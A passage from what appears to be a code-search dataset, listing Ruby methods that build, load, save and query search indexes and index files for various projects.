index\"\n end\n\n # Read the stream declaration block and then update the\n # info attribute of the stream object\n if !info.empty?\n @rio, pos = info.interval_io[0]\n if read_one_block(pos, @rio).type != DATA_BLOCK\n raise InvalidIndex, \"invalid start IO reference in index\"\n end\n\n if block_info.index != idx\n raise InvalidIndex, \"invalid interval_io: stream index mismatch for #{@streams[idx].name}. Expected #{idx}, got #{data_block_index}.\"\n end\n\n\t\t if !info.index.sane?\n raise InvalidIndex, \"index failed internal sanity check\"\n\t\t end\n\n @streams[idx].instance_variable_set(:@info, info)\n end\n end\n return @streams.compact\n\n rescue InvalidIndex => e\n Pocolog.warn \"invalid index file #{index_filename}\"\n\t nil\n end",
"def index(file) \n\n file = File.open(file, \"r\")\n tasks = file.readlines\n file.close\n\n return tasks\n\nend",
"def initialize(file, options = nil)\n @options = options || {}\n\t\t@index = {}\t\n\t\t@dbFile = file\n\t\tmakeIndex\n\tend",
"def construct_index\n @logger.fine('Constructing index...')\n File.open(@index_path, 'wb') do |f|\n write_int(@data_timestamp, f) # The timestamp value - used to determine if an index is valid.\n write_int(0, f) # The first row - always at offset 0.\n @data.each_line { write_int(@data.pos, f) } # The rest of the rows.\n end\n end",
"def parse(file)\n if @db.nil?\n return\n end\n\n begin\n @db.transaction\n @db.execute \"DROP INDEX IF EXISTS idx_markov_phrase\"\n IO.readlines(file).map {|l| insert(l)}\n @db.execute \"CREATE INDEX idx_markov_phrase ON markov(phrase)\"\n @db.commit\n rescue\n puts \"error reading #{file}\"\n @db.rollback\n end\n end",
"def index_file\n File.join(@directory, @host)\n end",
"def run(content, params={})\n markdown = Redcarpet::Markdown.new(Redcarpet::Render::HTML, autolink: true, space_after_headers: true)\n page_text = extract_text(markdown.render(item.raw_content))\n title = item[:title] || item.identifier\n file_name = item.identifier.to_s.gsub(/\\//,'_')\n puts \"Indexing page: #{@item.identifier} to #{@tmp_index}/#{file_name}.idx\"\n unless Dir.exists?(@tmp_index)\n Dir.mkdir(@tmp_index)\n end\n\n\n\n idx_file_name = \"#{@tmp_index}/#{file_name}.idx\"\n if File.exists?(idx_file_name)\n File.delete(idx_file_name)\n end\n File.open(idx_file_name,\"w+\") do |file|\n file.write({title: title, text: page_text, tags: \"api\", loc: @item.path }.to_json)\n end\n content\n end",
"def _index_document(opts = {})\n index_document(opts)\n end",
"def create_search_index\n Tire.index self.index_name\n end",
"def update_index\n index_files = []\n index_files << upload(\"specs.4.8.gz\", specs_index)\n log \"Uploaded all specs index\"\n index_files << upload(\"latest_specs.4.8.gz\", latest_index)\n log \"Uploaded latest specs index\"\n index_files << upload(\"prerelease_specs.4.8.gz\", prerelease_index)\n log \"Uploaded prerelease specs index\"\n\n index_files.each do |file|\n tuf_repo.replace_file(file, 'targets/unclaimed', 'targets')\n end\n\n # For now assume all files are unclaimed\n pending_files = tuf_pending_store.pending\n pending_files.each do |file|\n puts \"Adding file: #{file.path}\"\n tuf_repo.add_file(file, 'targets/unclaimed', 'targets')\n end\n tuf_repo.publish!\n tuf_pending_store.clear(pending_files)\n end",
"def create_index_file\n return [] unless File.exist? path\n\n RelatonBib.parse_yaml File.read(path, encoding: \"UTF-8\"), [Symbol]\n end",
"def parse_file\n n = 0\n begin\n @opener.open(@indexfile,\"r\") do |f|\n until f.eof?\n # read the entry\n entry = read_entry(f, n)\n n += 1\n end\n end\n return true\n rescue Errno::ENOENT\n return false\n end\n end",
"def read_index_file\n return if !File.exist?(path) || File.ctime(path).to_date < Date.today\n\n RelatonBib.parse_yaml File.read(path, encoding: \"UTF-8\"), [Symbol]\n end",
"def add_to_index(wiki, index, sha, files)\n end",
"def get_indexfile_with_line number\n IO.readlines(@indexfile)[number]\n end",
"def index(options = {})\n system(\"gem generate_index -d #{@path} > /dev/null\")\n # options = {:build_legacy => true, :build_modern => true}.merge(options)\n # indexer = indexer(options)\n # options[:update] ? indexer.update_index : indexer.generate_index\n end",
"def run(content, params={})\n # only process item that are changed since last regeneration\n if (!@last_indexed.nil? && @last_indexed > item.mtime)\n return content\n end\n\n puts \"Indexing page #{@item.identifier}\"\n\n while not @index.running?\n # wait for the indextank index to get ready\n sleep 0.5\n end\n\n page_text = extract_text(content)\n\n @index.document(@item.identifier).add({\n :text => page_text,\n :title => @item[:title] || item.identifier\n })\n puts 'Indexed ' << item.identifier\n\n @last_indexed = Time.now\n write_last_indexed\n\n content\n end",
"def process_index\n bindings = {\n :url => @definition.get_url,\n :name => @definition.get_name,\n :resources => @definition.resources,\n :description => @definition.get_description,\n :version => @definition.get_version\n }\n\n page = Calamum::DocGenerator.new(:index)\n page.save_template('index.html', bindings)\n end",
"def invertedIndex (folder)\n begin\n # Set doc number\n docNumber = 1\n # Iterate over each file in folder\n Find.find(folder) do |filename|\n begin\n # Ignore just folder name\n if !filename.eql? folder\n # Read in each file\n # If .docx\n if filename.include? \".docx\"\n file = Docx::Document.open(filename)\n file.each_paragraph do |line|\n processLine(docNumber, line)\n end\n # Assume text otherwise for now\n else\n file = File.open(filename)\n file_data = file.read\n # Read in file line by line\n file_data.each_line do |line|\n processLine(docNumber, line)\n end\n file.close\n end\n docNumber += 1\n end\n rescue\n puts \"Error in file name\"\n puts filename\n puts docNumber\n puts \"\\n\\n\"\n end\n \n end\n rescue\n puts \"Error in folder name\"\n exit 4\n end\n puts \"Inverted index initialized and created\"\nend",
"def build_index\n\n\t\t# Names the file based on date and time for uniqueness and ability to find which one you want later\n\t\tt = Time.now\n\t\t@file_time = t.strftime(\"%Y.%b.%d_%H.%M.%S\")\n\t\t@filename = \"quilt_pages/#{@needed_rows}x#{@needed_columns}_#{@file_time}.html\"\n\n\t\t# Store the quilt page template in a variable\n\t\tquilt_template = File.read \"templates/quilt_template.erb\"\n\t\t# Start a new ERB\n\t\terb_template = ERB.new quilt_template\n\t\t# Pull it all together and put info into one variable\n\t\tquilt_page = erb_template.result(binding)\n\n\t\t# Makes the directory for the quilt pages if there isn't one\n\t\tDir.mkdir(\"quilt_pages\") unless Dir.exists? \"quilt_pages\"\n\n\t\t# Opens the file and saves (actually writes) the quilt info\n\t\tFile.open(@filename, 'w') do |file|\n\t\t\tfile.puts quilt_page\n\t\tend\n\n\t\tsystem(\"open #{@filename}\")\n\tend",
"def load_script_from_index\n lines = File.readlines(index_filename)\n path = ENV['ALTERNATIVE_PATH'] || '.'\n lines.each do |filename|\n require(File.join(path, filename.chomp))\n end\n end",
"def index\n Index.new(root, paths, extensions, aliases)\n end",
"def execute_search(&on_result)\n Fast.public_send(search_method_name,\n expression,\n @files,\n parallel: parallel?,\n on_result: on_result)\n end",
"def construct_index\n end",
"def makeIndex()\n\t\tputs \"Indexing TlpDB...\" unless @options[:quiet]\n\n\t\tlineno = 1\n\t\tfor line in @dbFile do\n\t\t\tif line =~ /^name (.*)/ then\n\t\t\t\t@index[$1] = lineno\n\t\t\tend\n\t\t\tlineno = lineno.next\n\t\tend\n\n\t\tputs \"Done. #{@index.size} packages\" unless @options[:quiet]\n\tend",
"def build\n @logger.info(\"INDEXING\") { \"Building index of type #{@index_definition.name}\" }\n rdf_types = @index_definition.related_rdf_types\n number_of_documents = count_documents(rdf_types)\n @logger.info(\"INDEXING\") do\n %(Found #{number_of_documents} documents to index\n - matching type(s) #{rdf_types.inspect}\n - using allowed groups #{@search_index.allowed_groups}\"\n )\n end\n batches =\n if @max_batches && (@max_batches != 0)\n [@max_batches, number_of_documents / @batch_size].min\n else\n number_of_documents / @batch_size\n end\n batches = batches + 1\n @logger.info(\"INDEXING\") { \"Number of batches: #{batches}\" }\n\n Parallel.each(1..batches, in_threads: @number_of_threads) do |i|\n batch_start_time = Time.now\n @logger.info(\"INDEXING\") { \"Indexing batch #{i}/#{batches}\" }\n failed_documents = []\n @sparql_connection_pool.with_authorization(@search_index.allowed_groups) do |sparql_client|\n document_builder = MuSearch::DocumentBuilder.new(\n tika: @tika,\n sparql_client: sparql_client,\n attachment_path_base: @attachment_path_base,\n logger: @logger\n )\n document_uris = get_documents_for_batch(rdf_types, i)\n document_uris.each do |document_uri|\n @logger.debug(\"INDEXING\") { \"Indexing document #{document_uri} in batch #{i}\" }\n document = document_builder.build_document_for_index(\n uri: document_uri,\n index_definition: @index_definition\n )\n @elasticsearch.insert_document @search_index.name, document_uri, document\n rescue StandardError => e\n failed_documents << document_uri\n @logger.warn(\"INDEXING\") { \"Failed to index document #{document_uri} in batch #{i}\" }\n @logger.warn { e.full_message }\n end\n end\n @logger.info(\"INDEXING\") { \"Processed batch #{i}/#{batches} in #{(Time.now - batch_start_time).round} seconds.\" }\n if failed_documents.length > 0\n @logger.warn(\"INDEXING\") { \"#{failed_documents.length} documents failed to index in batch #{i}.\" }\n @logger.debug(\"INDEXING\") { \"Failed documents: #{failed_documents}\" }\n end\n end\n end",
"def build_index\n reset @store.all_files.sort, @store.all_classes_and_modules.sort\n\n index_classes\n index_methods\n index_pages\n\n { :index => @index }\n end",
"def perform(filepath)\n\n end",
"def create\n @indexed_file = IndexedFile.new(params[:indexed_file])\n\n respond_to do |format|\n if @indexed_file.save\n format.html { redirect_to @indexed_file, notice: 'Indexed file was successfully created.' }\n format.json { render json: @indexed_file, status: :created, location: @indexed_file }\n else\n format.html { render action: \"new\" }\n format.json { render json: @indexed_file.errors, status: :unprocessable_entity }\n end\n end\n end",
"def reindex(id_list_file, clean_index)\n reindex_list(id_list_file, clean_index)\n rescue ArgumentError => e\n raise e\n rescue StandardError => e\n Rails.logger.error 'Execution interrupted by unexpected error'\n Rails.logger.error [e.class.to_s, e.message, *e.backtrace].join($RS)\n end",
"def index(index)\n execute(:index, index)\n end",
"def index ; @index ; end",
"def index\r\n build_index unless @index\r\n @index\r\n end",
"def save\n File.open(@index_file, 'wb') do |f|\n Marshal.dump([@terms, @index], f)\n end\n end",
"def add_to_index_files(idx, name)\n year = NvdFileSystem::year_from_name(name)\n\n path=\"#{@nvdfs.root_path}/index\"\n Dir.mkdir path unless Dir.exist? path\n path += \"/#{year}\"\n Dir.mkdir path unless Dir.exist? path\n path += \"/#{idx}\"\n Dir.mkdir path unless Dir.exist? path\n path += \"/#{name}\"\n\n begin\n File.open(path,\"wb\") {|f| f.write(\"\") }\n rescue Exception => ex\n str=\"unable to create index file #{path}\"\n puts str\n end\n\n end",
"def open_index(o={})\n @clf = cache_data('clf', Searcher.load_features())\n @con_weights = cache_data('con_weights', Searcher.load_weights(CON_FEATURES, 'con', Conf.weight_con))\n @doc_weights = cache_data('doc_weights', Searcher.load_weights(DOC_FEATURES, 'doc', Conf.weight_doc))\n end",
"def save\n File.open(@index_file, 'wb') do |f|\n f.puts Marshal::dump([@terms, @index])\n end\n end",
"def build\n # Note: @index_definitions will only contain multiple elements in case of a composite type.\n @index_definitions.each do |type_def|\n @logger.info(\"INDEXING\") { \"Building index of type #{type_def[\"type\"]}\" }\n rdf_type = type_def[\"rdf_type\"]\n number_of_documents = count_documents(rdf_type)\n @logger.info(\"INDEXING\") { \"Found #{number_of_documents} documents to index of type #{rdf_type} with allowed groups #{@search_index.allowed_groups}\" }\n batches =\n if @max_batches && (@max_batches != 0)\n [@max_batches, number_of_documents / @batch_size].min\n else\n number_of_documents / @batch_size\n end\n batches = batches + 1\n @logger.info(\"INDEXING\") { \"Number of batches: #{batches}\" }\n\n Parallel.each(1..batches, in_threads: @number_of_threads) do |i|\n batch_start_time = Time.now\n @logger.info(\"INDEXING\") { \"Indexing batch #{i}/#{batches}\" }\n failed_documents = []\n\n @sparql_connection_pool.with_authorization(@search_index.allowed_groups) do |sparql_client|\n document_builder = MuSearch::DocumentBuilder.new(\n tika: @tika,\n sparql_client: sparql_client,\n attachment_path_base: @attachment_path_base,\n logger: @logger\n )\n document_uris = get_documents_for_batch rdf_type, i\n document_uris.each do |document_uri|\n @logger.debug(\"INDEXING\") { \"Indexing document #{document_uri} in batch #{i}\" }\n document = document_builder.fetch_document_to_index(\n uri: document_uri,\n properties: type_def[\"properties\"])\n @elasticsearch.insert_document @search_index.name, document_uri, document\n rescue StandardError => e\n failed_documents << document_uri\n @logger.warn(\"INDEXING\") { \"Failed to index document #{document_uri} in batch #{i}\" }\n @logger.warn { e.full_message }\n end\n end\n @logger.info(\"INDEXING\") { \"Processed batch #{i}/#{batches} in #{(Time.now - batch_start_time).round} seconds.\" }\n if failed_documents.length > 0\n @logger.warn(\"INDEXING\") { \"#{failed_documents.length} documents failed to index in batch #{i}.\" }\n @logger.debug(\"INDEXING\") { \"Failed documents: #{failed_documents}\" }\n end\n end\n end\n end",
"def initialize(index_filename, number_of_docs)\n\n\t\tif File.exists?(index_filename)\n\t\t\tFile.open(index_filename, \"rb\") do |file|\n\t\t\t\t@index = Marshal.load(file.read)\n\t\t\tend\n\t\telse\n\t\t\tputs \"Sorry, this file doesn't exist. \\n Perhaps you haven't run 'invert.rb' yet?\"\n\t\t\texit\n\t\tend\n\n\t\t#Collects information on the document vector\n\t\t@vdocs = Hash.new\n\t\tt_i = 0 #term\n\n\t\t@index.each do |term, data|\n\t\t\tdata.postings.each do |doc_id, doc_data|\n\n\t\t\t\tidf = Math.log(number_of_docs/data.term_doc_freq)\n\t\t\t\tweight = (1 + Math.log(doc_data.freq)) * idf\n\n\t\t\t\tif @vdocs[doc_id] == nil\n\t\t\t\t\t@vdocs[doc_id] = VectorData.new\n\t\t\t\tend\n\n\t\t\t\t@vdocs[doc_id].norm += weight * weight\n\t\t\t\t@vdocs[doc_id].t_id.push(t_i)\n\t\t\t\t@vdocs[doc_id].w.push(weight)\n\t\t\tend\n\n\t\t\tt_i += 1\n\t\tend\n\n\t\t@vdocs.each_value do |v|\n\t\t\tv.norm = Math.sqrt(v.norm)\n\t\tend\n\n\t\t@vdocs = Hash[@vdocs.sort_by { |k,v| k}]\n\tend",
"def save_index\n @index.compute_digest(@data_file)\n @index.to_disk(@index_file)\n end",
"def analyze_file (file_name)\n @analyzers = []\n # this will get an instance of LineAnalyzer for each line of your data file into an array\n File.foreach(file_name).with_index do |line, line_number|\n # << is a common shorthand to append an item to an array\n @analyzers << LineAnalyzer.new(line, line_number + 1) # add one because line_number will start at 0\n end\n @analyzers # so we can examine the return\n end",
"def create_main_index(data)\n create_partials data[:sub_file], data\n data[:header] = read_file(get_header_path(data[:sub_file]))\n data[:footer] = read_file(get_footer_path(data[:sub_file]))\n data[:stylesheetloc] = main_file_stylesheet_locs\n write_data data, 'data'\n system 'erb _templates/_index.html.erb > index.html'\n end",
"def create_search_index\n #Notice the assoction on article.user.id\n TaggyMcFaggy.create_index :attribute_namespace => :article_text,\n :document_id => id,\n :words => text_content,\n :association => user.id\n \n end",
"def generate_index(basename)\n debug_msg \"Generating index #{basename}.html\"\n template_file = @template_dir + \"#{basename}.html.erb\"\n outfile = @output_dir + \"#{basename}.html\"\n render_template(template_file, binding(), outfile)\n end",
"def search(index, options = {}, &block)\n searcher = Tire::Search::Search.new(index, &block)\n options = options.dup\n if index.include?('/')\n index, type = index.split('/', 2)\n options[:type] = type\n end\n @indices << index\n @parts << [index, options, searcher]\n end",
"def indexed?\n @index_file and File.exist?(@index_file)\n end",
"def create_search_index\n Tire.index Person.index_name do\n create(\n settings: {\n analysis: {\n filter: {\n name_ngrams: {\n 'side' => 'front',\n 'max_gram' => 10,\n 'min_gram' => 1,\n 'type' => 'edgeNGram'\n }\n },\n analyzer: {\n full_name: {\n 'filter' => %w(standard lowercase asciifolding),\n 'type' => 'custom',\n 'tokenizer' => 'standard'\n },\n partial_name: {\n 'filter' => %w(standard lowercase asciifolding name_ngrams),\n 'type' => 'custom',\n 'tokenizer' => 'standard'\n },\n keyword: {\n 'filter' => %w(lowercase),\n 'tokenizer' => 'keyword'\n }\n }\n },\n store: {\n type: Rails.env.test? ? :memory : :niofs\n }\n },\n mappings: {\n person: {\n properties: {\n first_name: {\n fields: {\n partial: {\n search_analyzer: 'full_name',\n index_analyzer: 'partial_name',\n type: 'string'\n },\n first_name: {\n type: 'string',\n analyzer: 'full_name'\n }\n },\n type: 'multi_field'\n },\n last_name: {\n fields: {\n partial: {\n search_analyzer: 'full_name',\n index_analyzer: 'partial_name',\n type: 'string'\n },\n last_name: {\n type: 'string',\n analyzer: 'full_name'\n }\n },\n type: 'multi_field'\n },\n initials: {\n type: 'string',\n analyzer: 'simple'\n },\n profession: {\n type: 'string',\n analyzer: 'keyword'\n },\n email: {\n type: 'string',\n analyzer: 'simple'\n },\n login: {\n type: 'string',\n analyzer: 'simple'\n },\n year_entrance: {\n type: 'date',\n format: 'YYYY'\n },\n year_out: {\n type: 'date',\n format: 'YYYY'\n }\n }\n }\n }\n )\n end\n end",
"def indexItem(itemID, batch, nailgun)\n\n # Grab the main metadata file\n metaPath = arkToFile(itemID, \"meta/base.meta.xml\")\n if !File.exist?(metaPath) || File.size(metaPath) < 50\n puts \"Warning: skipping #{itemID} due to missing or truncated meta.xml\"\n $nSkipped += 1\n return\n end\n rawMeta = fileToXML(metaPath)\n rawMetaXML = rawMeta.to_xml(indent: 3)\n rawMeta.remove_namespaces!\n rawMeta = rawMeta.root\n\n isPending = metaPath.include?(\"/next/\")\n\n existingItem = Item[itemID]\n\n normalize = nil\n if rawMeta.name =~ /^DISS_submission/ ||\n (rawMeta.name == \"mets\" && rawMeta.attr(\"PROFILE\") == \"http://www.loc.gov/mets/profiles/00000026.html\")\n normalize = \"ETD\"\n elsif rawMeta.name == \"mets\"\n normalize = \"BioMed\"\n elsif rawMeta.name == \"Publisher\"\n normalize = \"Springer\"\n end\n\n Thread.current[:name] = \"index thread: #{itemID} #{sprintf(\"%-8s\", normalize ? normalize : \"UCIngest\")}\"\n\n if normalize\n dbItem, attrs, authors, contribs, units, issue, section, suppSummaryTypes =\n processWithNormalizer(normalize, itemID, metaPath, nailgun, isPending)\n else\n dbItem, attrs, authors, contribs, units, issue, section, suppSummaryTypes =\n parseUCIngest(itemID, rawMeta, \"UCIngest\", isPending)\n end\n\n text = $noCloudSearchMode ? \"\" : grabText(itemID, dbItem.content_type)\n \n # Create JSON for the full text index\n authsAndContribs = authors.map { |auth| auth[:name][0,1024] } + contribs.map { |c| c[:name][0,1024] }\n idxItem = {\n type: \"add\", # in CloudSearch land this means \"add or update\"\n id: itemID,\n fields: {\n title: dbItem[:title] ? cleanTitle(dbItem[:title]) : \"\",\n authors: authsAndContribs.length > 1000 ? authsAndContribs[0,1000] : authsAndContribs,\n abstract: attrs[:abstract] || \"\",\n type_of_work: dbItem[:genre],\n disciplines: attrs[:disciplines] ? attrs[:disciplines] : [\"\"], # only the numeric parts\n peer_reviewed: attrs[:is_peer_reviewed] ? 1 : 0,\n pub_date: dbItem[:published].to_date.iso8601 + \"T00:00:00Z\",\n pub_year: dbItem[:published].year,\n rights: rightsURLToCode(dbItem[:rights]),\n sort_author: (authors[0] || {name:\"\"})[:name].gsub(/[^\\w ]/, '')[0,1024].downcase,\n keywords: attrs[:keywords] ? attrs[:keywords] : [\"\"],\n is_info: 0\n }\n }\n\n # Determine campus(es), department(s), and journal(s) by tracing the unit connnections.\n firstCampus = addIdxUnits(idxItem, units)\n\n # Use the first campus and various other attributes to make an OA policy association\n dbItem[:oa_policy] = oaPolicyAssoc(firstCampus, units, dbItem, attrs[:pub_status])\n\n # Summary of supplemental file types\n suppSummaryTypes.empty? or idxItem[:fields][:supp_file_types] = suppSummaryTypes.to_a\n\n # Limit text based on size of other fields (so, 1000 authors will mean less text).\n # We have to stay under the overall limit for a CloudSearch record. This problem is\n # a little tricky, since conversion to JSON introduces additional characters, and\n # it's hard to predict how many. So we just use a binary search.\n idxItem[:fields][:text] = text\n if JSON.generate(idxItem).bytesize > MAX_TEXT_SIZE\n idxItem[:fields][:text] = nil\n baseSize = JSON.generate(idxItem).bytesize\n toCut = (0..text.size).bsearch { |cut|\n JSON.generate({text: text[0, text.size - cut]}).bytesize + baseSize < MAX_TEXT_SIZE\n }\n (toCut==0 || toCut.nil?) and raise(\"Internal error: have to cut something, but toCut=#{toCut.inspect}\")\n #puts \"Note: Keeping only #{text.size - toCut} of #{text.size} text chars.\"\n idxItem[:fields][:text] = text[0, text.size - toCut]\n end\n\n # Make sure withdrawn items get deleted from the index. Also make sure pending items\n # aren't in the index.\n if attrs[:suppress_content] || dbItem[:status] == \"pending\"\n idxItem = {\n type: \"delete\",\n id: itemID\n }\n end\n\n dbAuthors = authors.each_with_index.map { |data, idx|\n ItemAuthor.new { |auth|\n auth[:item_id] = itemID\n auth[:attrs] = JSON.generate(data)\n auth[:ordering] = idx\n }\n }\n\n roleCounts = Hash.new { |h,k| h[k] = 0 }\n dbContribs = contribs.each_with_index.map { |data, _idx|\n ItemContrib.new { |contrib|\n contrib[:item_id] = itemID\n contrib[:role] = data[:role]\n data.delete(:role)\n contrib[:attrs] = JSON.generate(data)\n contrib[:ordering] = (roleCounts[contrib[:role]] += 1)\n }\n }\n\n # For convenient spelunking, record the archival metadata in the db\n dbArchiveMeta = collectArchiveMeta(itemID, rawMetaXML)\n\n # Calculate digests of the index data and database records\n idxData = JSON.generate(idxItem)\n idxDigest = Digest::MD5.base64digest(idxData)\n dbCombined = {\n dbItem: dbItem.to_hash,\n dbAuthors: dbAuthors.map { |authRecord| authRecord.to_hash },\n dbIssue: issue ? issue.to_hash : nil,\n dbSection: section ? section.to_hash : nil,\n units: units,\n archiveMeta: dbArchiveMeta.to_hash\n }\n dbContribs.empty? or dbCombined[:dbContribs] = dbContribs.map { |record| record.to_hash }\n dataDigest = Digest::MD5.base64digest(JSON.generate(dbCombined))\n\n # Add time-varying things into the database item now that we've generated a stable digest.\n timestamp = $preindexMode ? nil : DateTime.now\n dbItem[:last_indexed] = timestamp\n dbItem[:index_digest] = $noCloudSearchMode ? (existingItem && existingItem[:index_digest]) : idxDigest\n dbItem[:data_digest] = dataDigest\n\n dbDataBlock = { dbItem: dbItem, dbAuthors: dbAuthors, dbContribs: dbContribs,\n dbIssue: issue, dbSection: section, units: units,\n dbArchiveMeta: dbArchiveMeta }\n\n # Single-item debug\n if $testMode\n fooData = dbCombined.clone\n fooData.delete(:archiveMeta)\n pp fooData\n fooData = idxItem.clone\n fooData[:fields] and fooData[:fields][:text] and fooData[:fields].delete(:text)\n pp fooData\n exit 1\n end\n\n # If nothing has changed, skip the work of updating this record.\n if existingItem && !$forceMode && ($preindexMode || existingItem[:index_digest] == idxDigest)\n\n # If only the database portion changed, we can safely skip the CloudSearch re-indxing\n if existingItem[:data_digest] != dataDigest\n puts \"#{$forceMode ? \"Forced\" : \"Changed\"} item. (database change only, search data unchanged)\"\n $dbMutex.synchronize {\n DB.transaction { updateDbItem(dbDataBlock) }\n }\n $nProcessed += 1\n return\n end\n\n # Nothing changed; just update the timestamp.\n puts \"Unchanged item.\"\n existingItem.last_indexed = timestamp\n existingItem.save\n $nUnchanged += 1\n return\n end\n\n puts \"#{existingItem ? ($forceMode ? 'Forced' : 'Changed') : 'New'} item.#{attrs[:suppress_content] ? \" (suppressed content)\" : \"\"}\"\n\n if $noCloudSearchMode\n $dbMutex.synchronize {\n DB.transaction { updateDbItem(dbDataBlock) }\n }\n $nProcessed += 1\n return\n end\n\n # Make doubly sure the logic above didn't generate a record that's too big.\n if idxData.bytesize >= 1024*1024\n puts \"idxData=\\n#{idxData}\\n\\nInternal error: generated record that's too big.\"\n exit 1\n end\n\n # If this item won't fit in the current batch, send the current batch off and clear it.\n if batch[:idxDataSize] + idxData.bytesize > MAX_BATCH_SIZE || batch[:items].length > MAX_BATCH_ITEMS\n #puts \"Prepared batch: nItems=#{batch[:items].length} size=#{batch[:idxDataSize]} \"\n batch[:items].empty? or $batchQueue << batch.clone\n emptyBatch(batch)\n end\n\n # Now add this item to the batch\n batch[:items].empty? or batch[:idxData] << \",\\n\" # Separator between records\n batch[:idxData] << idxData\n batch[:idxDataSize] += idxData.bytesize\n batch[:items] << dbDataBlock\n #puts \"current batch size: #{batch[:idxDataSize]}\"\nend",
"def search_index(filename, term)\r\n puts \"Searching for the term: \" + term\r\n CSV.foreach(filename, :headers => true) do |row|\r\n \r\n begin\r\n doc = Nokogiri::HTML(open(row[0]))\r\n pagetext = doc.at('body').inner_text\r\n # Pretend that all words we care about contain only a-z, 0-9, or underscores\r\n if pagetext.scan(/\\w+/).include?(term) then puts \"Result: \" + row[0] else puts row[0] + \" does not include \" + term end\r\n rescue RuntimeError\r\n #puts \"Runtime error caught\"\r\n rescue OpenURI::HTTPError\r\n #puts \"OpenURI error caught\"\r\n rescue OpenURI::HTTPRedirect \r\n #puts \"OpenURI redir error caught\"\r\n end\r\n end\r\n \r\nend",
"def context(filename, search_text, host)\n return execute_search([filename], search_text, true, host)\n end",
"def croucher_index_file\n nil\n end",
"def index\n @@semaphore.synchronize {\n inner_index()\n }\n end",
"def create_index(word)\n create_index1(word)\n end",
"def analyze_file\n line_number = 0\n File.foreach('test.txt') do |line|\n @analyzers << LineAnalyzer.new(line.chomp, line_number += 1)\n end\n end",
"def generate\n debug_msg \"Generating JSON index\"\n\n debug_msg \" writing search index to %s\" % SEARCH_INDEX_FILE\n data = build_index\n\n return if @options.dry_run\n\n out_dir = @base_dir + @options.op_dir\n index_file = out_dir + SEARCH_INDEX_FILE\n\n FileUtils.mkdir_p index_file.dirname, :verbose => $DEBUG_RDOC\n\n index_file.open 'w', 0644 do |io|\n io.set_encoding Encoding::UTF_8\n io.write 'var search_data = '\n\n JSON.dump data, io, 0\n end\n unless ENV['SOURCE_DATE_EPOCH'].nil?\n index_file.utime index_file.atime, Time.at(ENV['SOURCE_DATE_EPOCH'].to_i).gmtime\n end\n\n Dir.chdir @template_dir do\n Dir['**/*.js'].each do |source|\n dest = File.join out_dir, source\n\n FileUtils.install source, dest, :mode => 0644, :preserve => true, :verbose => $DEBUG_RDOC\n end\n end\n end",
"def add(file)\n # add file to object db\n return false if !File.exists?(file)\n return false if !File.file?(file)\n \n sha = get_raw_repo.put_raw_object(File.read(file), 'blob')\n \n # add it to the index\n @git_index.add(file, sha)\n end",
"def load_index_in(source, words, remaining_words, priority)\n return unless @index_file_name\n index_source = source.relative_child(@index_file_name)\n load_relevant_path(index_source, words, remaining_words, priority) if index_source\n end",
"def build_index(&key_builder)\n hashes = Hash.new { |h, k| h[k] = [] }\n keys = {}\n pos = 0\n\n @logger.fine('Generating hash...')\n @data.seek(0)\n @data.each_line do |line|\n key = key_builder.call(line)\n raise IndexError.new(\"Key '#{key}' already mapped\") if keys.has_key?(key)\n\n keys[key] = true\n hash = get_hash(key)\n hashes[hash] << [key, pos]\n pos = @data.pos\n end\n\n # Generate the index files now.\n @logger.fine('Constructing index...')\n FileUtils.rm_r(@index_folder) if File.exist?(@index_folder)\n FileUtils.mkdir(@index_folder)\n hashes.each_pair do |hash, data|\n data = data.sort { |d1, d2| d1[0] <=> d2[0] }\n path = File.join(@index_folder, \"#{hash}.index\")\n File.open(path, 'wb') do |f|\n write_int(@data_timestamp, f) # The timestamp for this index file.\n data.each { |key, offset| f.write([key, offset].pack('Z*L')) } # The keys mapped to this index file.\n end\n end\n\n nil\n end",
"def from_indexes(file_index, rank_index)\n return nil unless valid_indexes?(file_index, rank_index)\n new(files[file_index], ranks[rank_index])\n end",
"def index name = nil, dictionary = 'english', &block\n search_name = ['search', name].compact.join('_')\n\n class_eval do\n named_scope search_name.to_sym, lambda { |term|\n # Let's extract the individual terms to allow for quoted terms.\n term = term.scan(/\"([^\"]+)\"|(\\S+)/).flatten.compact.map {|lex| \"'#{lex}'\"}.join(' & ')\n {\n :select => \"#{table_name}.*, ts_rank_cd((#{full_text_indexes.first.to_s}),\n to_tsquery(#{connection.quote(term)})) as rank\",\n :conditions =>\n [\"#{full_text_indexes.first.to_s} @@ to_tsquery(?)\", term],\n :order => 'rank DESC'\n }\n }\n end\n index_name = [table_name, name, 'fts_idx'].compact.join('_')\n (self.full_text_indexes ||= []) <<\n FullTextIndex.new(index_name, dictionary, self, &block)\n end",
"def with_index_lock\n lock_path = \"#{@index_file}.lock\"\n File.open(lock_path, \"w+\") do |f|\n f.flock(File::LOCK_EX)\n yield\n end\n end",
"def load_old_index\n file = File.open('/home/matt/Documents/programming/ruby/dmsw/index.html', 'rb')\n html = file.read.chomp\n file.close\n return html\nend",
"def indexAllItems\n begin\n Thread.current[:name] = \"index thread\" # label all stdout from this thread\n batch = emptyBatch({})\n\n # The resolver and catalog stuff below is to prevent BioMed files from loading external DTDs\n # (which is not only slow but also unreliable)\n classPath = \"/apps/eschol/erep/xtf/WEB-INF/lib/saxonb-8.9.jar:\" +\n \"/apps/eschol/erep/xtf/control/xsl/jing.jar:\" +\n \"/apps/eschol/erep/xtf/normalization/resolver.jar\"\n Nailgun.run(classPath, 0, \"-Dxml.catalog.files=/apps/eschol/erep/xtf/normalization/catalog.xml\") { |nailgun|\n loop do\n # Grab an item from the input queue\n Thread.current[:name] = \"index thread\" # label all stdout from this thread\n itemID = $indexQueue.pop\n itemID or break\n\n # Extract data and index it (in batches)\n begin\n Thread.current[:name] = \"index thread: #{itemID}\" # label all stdout from this thread\n indexItem(itemID, batch, nailgun)\n rescue Exception => e\n puts \"Error indexing item #{itemID}\"\n raise\n end\n\n # To avoid Saxon's Java process from growing gigantic, restart it once in a while.\n nailgun.callCount == 1000 and nailgun.restart\n end\n }\n\n # Finish off the last batch.\n batch[:items].empty? or $batchQueue << batch\n rescue Exception => e\n if $preindexMode\n raise e\n else\n puts \"Exception in indexAllItems: #{e} #{e.backtrace}\"\n end\n ensure\n $batchQueue << nil # marker for end-of-queue\n end\nend",
